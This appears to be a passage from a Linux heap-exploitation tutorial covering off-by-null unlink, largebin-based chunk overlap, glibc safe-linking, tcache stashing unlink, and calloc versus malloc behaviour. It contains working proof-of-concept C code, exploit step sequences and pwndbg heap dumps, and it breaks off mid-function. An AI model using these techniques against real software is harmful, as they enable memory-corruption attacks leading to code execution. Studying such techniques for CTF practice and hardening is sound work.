    free(arr[i]);
    arr[i] = NULL;
}

int main() {
    char* p = (char*)malloc(0x100);
    // arr[0..48]: 7 chunks each of sizes 0x90, 0xa0, ..., 0xf0 (used to fill and drain the tcache)
    for(int i=0;i<7;i++) {
        for(int j=0;j<7;j++) {
            arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
        }
    }
    arr[49]=(long long*)malloc(0x98);
    arr[50]=(long long*)malloc(0x98);
    arr[51]=(long long*)malloc(0x18);
    arr[52]=(long long*)malloc(0xa8);
    arr[53]=(long long*)malloc(0xb8);
    arr[54]=(long long*)malloc(0xd8);
    arr[55]=(long long*)malloc(0xd8);
    arr[56]=(long long*)malloc(0xe8);
    arr[57]=(long long*)malloc(0xe8);
    arr[58]=(long long*)malloc(0x98);
    arr[59]=(long long*)malloc(0xe8);
    arr[60]=(long long*)malloc(0x18);
    arr[56][0]=0x200;
    arr[56][1]=0xe0;
    int fr[40]={0,1,2,3,4,5,6,14,15,16,17,18,19,20,21,22,23,24,25,26,27,35,36,37,38,39,40,41,42,43,44,45,46,47,48,52,53,54,55,56};
    for(int i=0;i<40;i++) {
        free_o(fr[i]);
    }
    for(int i=0;i<7;i++) {
        if(i==1||i==4){
            continue;
        }
        for(int j=0;j<7;j++) {
            arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
        }
    }
    arr[52]=(long long*)malloc(0x98);
    arr[53]=(long long*)malloc(0x98);
    ((char*)(arr[53]))[0x98]='\x00';
    arr[54]=(long long*)malloc(0x88);
    arr[55]=(long long*)malloc(0x88);
    arr[56]=(long long*)malloc(0xd8);
    int fr2[21]={0,1,2,3,4,5,6,7,8,9,10,11,12,13,42,43,44,45,46,47,48};
    for(int i=0;i<21;i++) {
        free_o(fr2[i]);
    }
    free_o(50);
    free_o(54);
    free_o(59);
    free_o(53);

    for(int i=0;i<7;i++) {
        if(i==2||i==3||i==4||i==5){
            continue;
        }
        for(int j=0;j<7;j++) {
            arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
        }
    }
    arr[59]=(long long*)malloc(0xd8);
    arr[53]=(long long*)malloc(0xb8);
    for(int i=0;i<7;i++) {
        free_o(i);
    }
    free_o(55);
    for(int i=0;i<7;i++) {
        arr[i]=(long long*)malloc(0x88);
    }
    arr[50]=(long long*)malloc(0x98);
    arr[54]=(long long*)malloc(0xb8);
    arr[55]=(long long*)malloc(0x38);
    int fr3[21]={42,43,44,45,46,47,48,7,8,9,10,11,12,13,21,22,23,24,25,26,27};
    for(int i=0;i<21;i++) {
        free_o(fr3[i]);
    }
    free_o(50);
    free_o(54);
    free_o(59);
    free_o(58);

    // step 1: restore 7~13, 21~27, 42~48 and re-split 58+59 into 0xd0+0xc0
    for(int i=0;i<7;i++) {
        if(i==0||i==2||i==4||i==5){
            continue;
        }
        for(int j=0;j<7;j++) {
            arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
        }
    }
    arr[58]=(long long*)malloc(0xc8);
    arr[54]=(long long*)malloc(0xb8);
    arr[59]=(long long*)malloc(0xb8);
    arr[50]=(long long*)malloc(0x98);

    // 0xa0, 0xa0, 0x20 from the top chunk
    arr[61]=(long long*)malloc(0x98);
    arr[62]=(long long*)malloc(0x98);
    arr[63]=(long long*)malloc(0x18);
    // step 2: fd->bk == P
    int fr4[14]={7,8,9,10,11,12,13,21,22,23,24,25,26,27};
    for(int i=0;i<14;i++) {
        free_o(fr4[i]);
    }
    free_o(62);
    free_o(50);
    free_o(54);
    free_o(49);

    // restore, re-splitting 49+50 into 0xd0+0x70
    for(int i=0;i<7;i++) {
        if(i==0||i==2||i==4||i==5||i==6){
            continue;
        }
        for(int j=0;j<7;j++) {
            arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
        }
    }
    arr[54]=(long long*)malloc(0xb8);
    arr[62]=(long long*)malloc(0x98);
    arr[49]=(long long*)malloc(0xc8);
    arr[50]=(long long*)malloc(0x68);

    // step 3: off-by-null from 49 (offset 0xa8) and 58 (offset 0xa0), fake size in 53
    ((char*)(arr[49]))[0xa8]='\x00';
    ((char*)(arr[58]))[0xa0]='\x00';
    arr[53][19]=0x2e1;
    // fill the 0xf0 tcache, then free 57 (prev_size 0x2e0) to trigger the backward unlink
    int fr5[7]={42,43,44,45,46,47,48};
    for(int i=0;i<7;i++) {
        free_o(fr5[i]);
    }
    free_o(57);
    puts("unlink success");
    return 0;
}

Method 2

Bypassing the checks with a largebin-sized construction

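# 1, 4 and 7 (0x110) are separators; 2/3 and 5/6 are adjacent on purpose
add(0,0x418,b'a')
add(1,0x108,b'a')
add(2,0x438,b'a')
add(3,0x438,b'a')
add(4,0x108,b'a')
add(5,0x488,b'a')
add(6,0x428,b'a')
add(7,0x108,b'a')

# 0, 3 and 6 go to the unsortedbin, then freeing 2 merges it with 3
delete(0)
delete(3)
delete(6)
delete(2)

# new 2 is 0x20 larger: it keeps old 3's header (fd/bk -> 0 and 6) and sets that size to 0x551;
# then take 3, 0 and 6 back
add(2,0x458,b'\x00'*0x438+b'\x51\x05')
add(3,0x418,b'a')
add(0,0x418,b'0'*0x100)
add(6,0x428,b'a')

# free 0 then 3 so chunk 0's bk points to new 3; the NUL after the 8 bytes (off-by-null) turns it into old 3
delete(0)
delete(3)
add(0,0x418,b'\x00'*8)

# 6 and 5 merge; re-allocating 5 rewrites 6's size as 0x431 and its off-by-null turns 6's fd into old 3
delete(6)
delete(5)
add(5,0x4f8,b'\x00'*0x488+p64(0x431))
add(6,0x3b8,b'a')
add(3,0x418,b'a')

# through 4: prev_size of 5 = 0x550 (old 3 + 4), and the off-by-null clears 5's PREV_INUSE
delete(4)
add(4,0x108,b'\x00'*0x100+p64(0x550))

# backward consolidation over old 3, 4 and 5 while 4 is still allocated
delete(5)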

A walkthrough follows. State right after the first delete(6):

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c00
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x440 Used None None
0x61107b3f7c00 0x0 0x440 Freed 0x61107b3f7290 0x61107b3f85e0
0x61107b3f8040 0x440 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7c00 0x73ccc601ace0
0x61107b3f8a10 0x430 0x110 Used None None
delete(2) consolidates chunks 2 and 3:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x880 Freed 0x61107b3f85e0 0x73ccc601ace0
0x61107b3f8040 0x880 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x61107b3f77c0
0x61107b3f8a10 0x430 0x110 Used None None

The new chunk 2 is 0x20 larger than the original, so it covers and preserves the header of the old chunk 3; the new chunk 3 is 0x20 smaller.

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601b0d0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x73ccc601b0d0
0x61107b3f8a10 0x430 0x110 Used None None

The preserved fd and bk still point to chunks 0 and 6. The payload also changes this chunk's size to chunk3_size + chunk4_size (0x440 + 0x110 = 0x550):

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

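Next, allocate all the other chunks back. The address of the old chunk 3 (its prev_size field) must end in \x00: a pointer to the new chunk 3 (old chunk 3 + 0x20) then differs from it only in the lowest byte, so an off-by-null turns it into a pointer to the old chunk 3.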
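Why the lowest byte is all that matters: an off-by-null writes a single NUL, and on little-endian x86-64 the first byte of a stored pointer is its least significant one. A minimal sketch with a hypothetical helper, using the addresses from the dumps:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simulates an off-by-null landing on a stored pointer: only the first byte
   in memory (the lowest byte on little-endian x86-64) becomes '\0'.
   Hypothetical helper for illustration. */
uint64_t off_by_null_ptr(uint64_t stored) {
    unsigned char bytes[sizeof stored];
    memcpy(bytes, &stored, sizeof bytes);   /* pointer as laid out in memory */
    bytes[0] = '\0';                        /* the single NUL written past the data */
    memcpy(&stored, bytes, sizeof stored);
    return stored;
}
```

With 0x61107b3f7c20 (the new chunk 3) as input the result is 0x61107b3f7c00, the old chunk 3; any target whose address does not end in 0x00 cannot be reached this way.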

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

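Next, make chunk 0's bk point to the old chunk 3. Freeing 0 and then 3 first makes chunk 0's bk point to the new chunk 3: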

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c20
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x61107b3f7290 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

Before the off-by-null:

pwndbg> tele 0x61107b3f7290
00:0000│ 0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ 0x61107b3f72a0 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c20 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

After the off-by-null:

00:0000│     0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ r9 0x61107b3f72a0 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c00 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

bk指向了原来的3

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

Next, make chunk 6's fd point to the old chunk 3.

First free 6 and 5 so that they consolidate:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f8150
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x8c0 Freed 0x61107b3f7c20 0x73ccc601ace0
0x61107b3f8a10 0x8c0 0x110 Used None None

Before the off-by-null:

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c20 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

After the off-by-null:

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c00 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601b0d0 0x73ccc601b0d0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8a10 0x3c0 0x110 Used None None

fd now points to the old chunk 3, which completes the construction:

pwndbg> x/6gx 0x61107b3f7290
0x61107b3f7290: 0x0000000000000000 0x0000000000000421
0x61107b3f72a0: 0x0000000000000000 0x000061107b3f7c00
0x61107b3f72b0: 0x0000000000000000 0x0000000000000000
pwndbg> x/6gx 0x61107b3f7c00
0x61107b3f7c00: 0x0000000000000000 0x0000000000000551
0x61107b3f7c10: 0x000061107b3f7290 0x000061107b3f85e0
0x61107b3f7c20: 0x0000000000000000 0x0000000000000421
pwndbg> x/6gx 0x61107b3f85e0
0x61107b3f85e0: 0x0000000000000000 0x0000000000000431
0x61107b3f85f0: 0x000061107b3f7c00 0x000073ccc601ace0
0x61107b3f8600: 0x0000000000000000 0x0000000000000000

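Next, use chunk 4 to off-by-null chunk 5's PREV_INUSE bit and set 5's prev_size to the combined size of chunks 3 and 4. Freeing 5 then consolidates the old chunk 3, chunk 4 and chunk 5 into one large free chunk while chunk 4 is still in use, which gives a UAF on chunk 4.

Before the off-by-null: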

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

After the off-by-null:

pwndbg> tele 0x61107b3f8150
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0
... ↓ 5 skipped

Heap state:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Freed 0x0 0x0
0x61107b3f8150 0x550 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

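Final step: delete chunk 5. Its PREV_INUSE bit is 0, so free uses prev_size to locate the header of the old chunk 3 and follows its fd/bk to chunks 0 and 6; chunk 0's bk and chunk 6's fd both point back to the old chunk 3. The newer size check (the chunk's size must equal the prev_size stored in the next chunk) also holds: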

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> tele 0x61107b3f7c00+0x550
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0

Both checks pass, so delete(5) consolidates the chunks:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Freed 0x0 0x0
Corrupt ?! (size == 0) (0x61107b3f7c20)
pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0xa51 /* 'Q\n' */
02:0010│ 0x61107b3f7c10 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> bins
tcachebins
empty
fastbins
empty
unsortedbin
all: 0x61107b3f7c00 —▸ 0x73ccc601ace0 (main_arena+96) ◂— 0x61107b3f7c00
smallbins
empty
largebins
empty

unsortedbin attack

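Leaking libc through the unsortedbin is still common, but the unsortedbin attack itself is practically dead: glibc 2.29 added a doubly-linked-list check to the unsorted-bin scan.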

decrypt_safe_linking

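Take free as an example: since glibc 2.32, when a chunk is freed into a fastbin or the tcache (both got this change), its next pointer is no longer stored in p->fd as-is; it is mangled with PROTECT_PTR and read back with REVEAL_PTR. Both are macros: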

/* Safe-Linking:  
Use randomness from ASLR (mmap_base) to protect single-linked lists
of Fast-Bins and TCache. That is, mask the "next" pointers of the
lists' chunks, and also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe-Unlinking in the double-linked lists of Small-Bins.
It assumes a minimum page size of 4096 bytes (12 bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works. */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
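The same arithmetic in plain C, as a sketch (function names are hypothetical; uint64_t avoids signed shifts). decrypt_safe_linking follows the bit-by-bit recovery used by how2heap's example of the same name and only works when the stored pointer and the address of the field share all bits from bit 12 upward (pos >> 12 == ptr >> 12), e.g. a tcache chunk pointing to another chunk in the same 4 KiB page.

```c
#include <assert.h>
#include <stdint.h>

/* PROTECT_PTR(pos, ptr): pos is the address of the fd/next field itself. */
uint64_t protect_ptr(uint64_t pos, uint64_t ptr) {
    return (pos >> 12) ^ ptr;
}

/* REVEAL_PTR is PROTECT_PTR(&ptr, ptr): XOR with the same key again. */
uint64_t reveal_ptr(uint64_t pos, uint64_t stored) {
    return (pos >> 12) ^ stored;
}

/* Recovers ptr from the mangled value alone, assuming pos >> 12 == ptr >> 12.
   The top 12 bits of the cipher are plaintext; each round turns the bits
   recovered so far into the next 12 bits of the key. */
uint64_t decrypt_safe_linking(uint64_t cipher) {
    uint64_t key = 0, plain = 0;
    for (int i = 1; i < 6; i++) {
        int bits = 64 - 12 * i;            /* 52, 40, 28, 16, 4 */
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12;
    }
    return plain;                          /* low 4 bits are 0 (16-byte aligned) */
}
```

When the next pointer is NULL (the last chunk of a tcache list), the stored value is just pos >> 12, so leaking that one value already gives the heap address shifted right by 12.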

The vulnerability (tcache stashing unlink) lies in the smallbin path of _int_malloc:

if (in_smallbin_range (nb))
  {
    idx = smallbin_index (nb);
    bin = bin_at (av, idx);

    if ((victim = last (bin)) != bin)
      {
        bck = victim->bk;
        if (__glibc_unlikely (bck->fd != victim))
          malloc_printerr ("malloc(): smallbin double linked list corrupted");
        set_inuse_bit_at_offset (victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
          set_non_main_arena (victim);
        check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
        /* While we're here, if we see other chunks of the same size,
           stash them in the tcache. */
        size_t tc_idx = csize2tidx (nb);
        if (tcache != NULL && tc_idx < mp_.tcache_bins)
          {
            mchunkptr tc_victim;

            /* While bin not empty and tcache not full, copy chunks over. */
            while (tcache->counts[tc_idx] < mp_.tcache_count
                   && (tc_victim = last (bin)) != bin)
              {
                if (tc_victim != 0)
                  {
                    bck = tc_victim->bk;
                    set_inuse_bit_at_offset (tc_victim, nb);
                    if (av != &main_arena)
                      set_non_main_arena (tc_victim);
                    bin->bk = bck;
                    bck->fd = bin;

                    tcache_put (tc_victim, tc_idx);
                  }
              }
          }
#endif
        void *p = chunk2mem (victim);
        alloc_perturb (p, bytes);
        return p;
      }
  }

The first part is sound: it performs the doubly-linked-list check.

if ((victim = last (bin)) != bin)
  {
    bck = victim->bk;
    if (__glibc_unlikely (bck->fd != victim))
      malloc_printerr ("malloc(): smallbin double linked list corrupted");
    set_inuse_bit_at_offset (victim, nb);
    bin->bk = bck;
    bck->fd = bin;

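But the loop that moves the remaining smallbin chunks into the tcache performs no such check (the two commented-out lines mark where it would go):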

if (tc_victim != 0)
  {
    bck = tc_victim->bk;
    // if (__glibc_unlikely (bck->fd != tc_victim))
    //   malloc_printerr ("malloc(): smallbin double linked list corrupted");
    set_inuse_bit_at_offset (tc_victim, nb);
    if (av != &main_arena)
      set_non_main_arena (tc_victim);
    bin->bk = bck;
    bck->fd = bin;

    tcache_put (tc_victim, tc_idx);
  }

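In other words, once the first chunk taken out passes the doubly-linked-list check, the bk pointers of the chunks behind it are followed without any check while they are stashed into the tcache. A forged bk therefore both links fake chunks into the tcache and makes bck->fd = bin write a main_arena address to an attacker-chosen location.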
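A toy model of the two code paths above, to show which write the forged bk produces. Everything here is hypothetical and simplified: `node` keeps only fd/bk, `count` and `limit` stand in for tcache->counts[tc_idx] and mp_.tcache_count, and tcache_put is left out. In a real attack `fake` is target_addr-0x10, so that its fd field is the target.

```c
#include <assert.h>
#include <stddef.h>

/* Toy doubly linked bin: only fd/bk, no sizes, no real arena. */
typedef struct node {
    struct node *fd;
    struct node *bk;
} node;

/* First allocation from the smallbin: checked, like the code above. */
node *take_checked(node *bin) {
    node *victim = bin->bk;                 /* last (bin) */
    if (victim == bin)
        return NULL;
    node *bck = victim->bk;
    if (bck->fd != victim)                  /* "smallbin double linked list corrupted" */
        return NULL;
    bin->bk = bck;
    bck->fd = bin;
    return victim;
}

/* The stashing loop: no bck->fd check at all. */
void stash(node *bin, int *count, int limit) {
    node *tc_victim;
    while (*count < limit && (tc_victim = bin->bk) != bin) {
        node *bck = tc_victim->bk;          /* attacker-controlled after corruption */
        bin->bk = bck;
        bck->fd = bin;                      /* the write primitive */
        (*count)++;                         /* tcache_put omitted */
    }
}
```

With a two-chunk smallbin, the head's bk pointed at `fake`, and the tcache count at 6, the first allocation returns the tail, the head is stashed, `fake->fd` receives the bin address, and the loop stops because the tcache is full.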

Unsortedbin attack on newer glibc

The value written is the address of the main_arena bins entry of the smallbin whose chunks are being moved into the tcache.

For example:

pwndbg> tele 0x7fffffffda58
00:0000│-018 0x7fffffffda58 —▸ 0x55555555a470 ◂— 0
01:0008│-010 0x7fffffffda60 —▸ 0x55555555a450 ◂— 0
02:0010│-008 0x7fffffffda68 —▸ 0x7ffff7fb4e00 (main_arena+352) —▸ 0x7ffff7fb4df0 (main_arena+336) —▸ 0x7ffff7fb4de0 (main_arena+320) —▸ 0x7ffff7fb4dd0 (main_arena+304) ◂— ...
03:0018│ rbp 0x7fffffffda70 ◂— 1


pwndbg> tele 0x7ffff7fb4e00
00:0000│ 0x7ffff7fb4e00 (main_arena+352) —▸ 0x7ffff7fb4df0 (main_arena+336) —▸ 0x7ffff7fb4de0 (main_arena+320) —▸ 0x7ffff7fb4dd0 (main_arena+304) —▸ 0x7ffff7fb4dc0 (main_arena+288) ◂— ...
01:0008│ 0x7ffff7fb4e08 (main_arena+360) —▸ 0x7ffff7fb4df0 (main_arena+336) —▸ 0x7ffff7fb4de0 (main_arena+320) —▸ 0x7ffff7fb4dd0 (main_arena+304) —▸ 0x7ffff7fb4dc0 (main_arena+288) ◂— ...
02:0010│ 0x7ffff7fb4e10 (main_arena+368) —▸ 0x55555555a330 ◂— 0
03:0018│ 0x7ffff7fb4e18 (main_arena+376) —▸ 0x7fffffffda58 —▸ 0x55555555a470 ◂— 0

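The fd slot of 0x7fffffffda58 (i.e. 0x7fffffffda68) now holds 0x7ffff7fb4e00 (main_arena+352). 0x7ffff7fb4e10 (main_arena+368) holds the fd of the 0x110 smallbin we stashed from and 0x7ffff7fb4e18 (main_arena+376) its bk, so the value written is bin_at for the 0x110 smallbin, 0x10 below its fd slot; that address coincides with the fd slot of the 0x100 smallbin.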
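These offsets can be reproduced by hand. A sketch assuming x86-64 and a glibc where the unsorted bin head is main_arena+96 as in the dumps above (main_arena+88 on older versions such as 2.23): bin_at(av, i) lies 0x10 below &bins[2*(i-1)], and on 64-bit smallbin_index(sz) is sz >> 4. The function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: offset of bin_at(&main_arena, 1), the unsorted bin, is 96. */
#define UNSORTED_BIN_OFF 96

/* Offset from main_arena of bin_at(av, idx); each bin uses 16 bytes (fd, bk). */
uint64_t bin_at_off(unsigned idx) {
    return UNSORTED_BIN_OFF + (uint64_t)(idx - 1) * 16;
}

/* smallbin_index on 64-bit: chunk size / 16. */
unsigned smallbin_index64(uint64_t chunk_size) {
    return (unsigned)(chunk_size >> 4);
}
```

For the 0x110 smallbin this gives index 17 and bin_at at +352, its fd slot at +368 and bk slot at +376, while the fd slot of the 0x100 bin is also +352, matching the dump.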

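calloc is not required. It is convenient because calloc does not look at the tcache first and takes the chunk from the smallbin directly, so only a few smallbin/tcache operations are needed. Without calloc the attack still works: fill the tcache, free several chunks into the unsortedbin, drain the tcache, and then allocate one more chunk so that it comes from the smallbin. It just takes more operations.

Below is a comparison of calloc and malloc in glibc 2.39: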

// calloc
void *
__libc_calloc (size_t n, size_t elem_size)
{
  mstate av;
  mchunkptr oldtop;
  INTERNAL_SIZE_T sz, oldtopsize;
  void *mem;
  unsigned long clearsize;
  unsigned long nclears;
  INTERNAL_SIZE_T *d;
  ptrdiff_t bytes;

  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
    {
      __set_errno (ENOMEM);
      return NULL;
    }

  sz = bytes;

  if (!__malloc_initialized)
    ptmalloc_init ();

  MAYBE_INIT_TCACHE ();

  if (SINGLE_THREAD_P)
    av = &main_arena;
  else
    arena_get (av, sz);

  if (av)
    {
      /* Check if we hand out the top chunk, in which case there may be no
         need to clear. */
#if MORECORE_CLEARS
      oldtop = top (av);
      oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
      /* Only newly allocated memory is guaranteed to be cleared. */
      if (av == &main_arena &&
          oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
        oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
      if (av != &main_arena)
        {
          heap_info *heap = heap_for_ptr (oldtop);
          if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
            oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
        }
#endif
    }
  else
    {
      /* No usable arenas. */
      oldtop = 0;
      oldtopsize = 0;
    }
  mem = _int_malloc (av, sz);
  ...

As shown, calloc never takes a chunk from the tcache; it calls _int_malloc directly.

malloc, for comparison:

void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;

  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
                  "PTRDIFF_MAX is not more than half of SIZE_MAX");

  if (!__malloc_initialized)
    ptmalloc_init ();
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice. */
  size_t tbytes = checked_request2size (bytes);
  if (tbytes == 0)
    {
      __set_errno (ENOMEM);
      return NULL;
    }
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

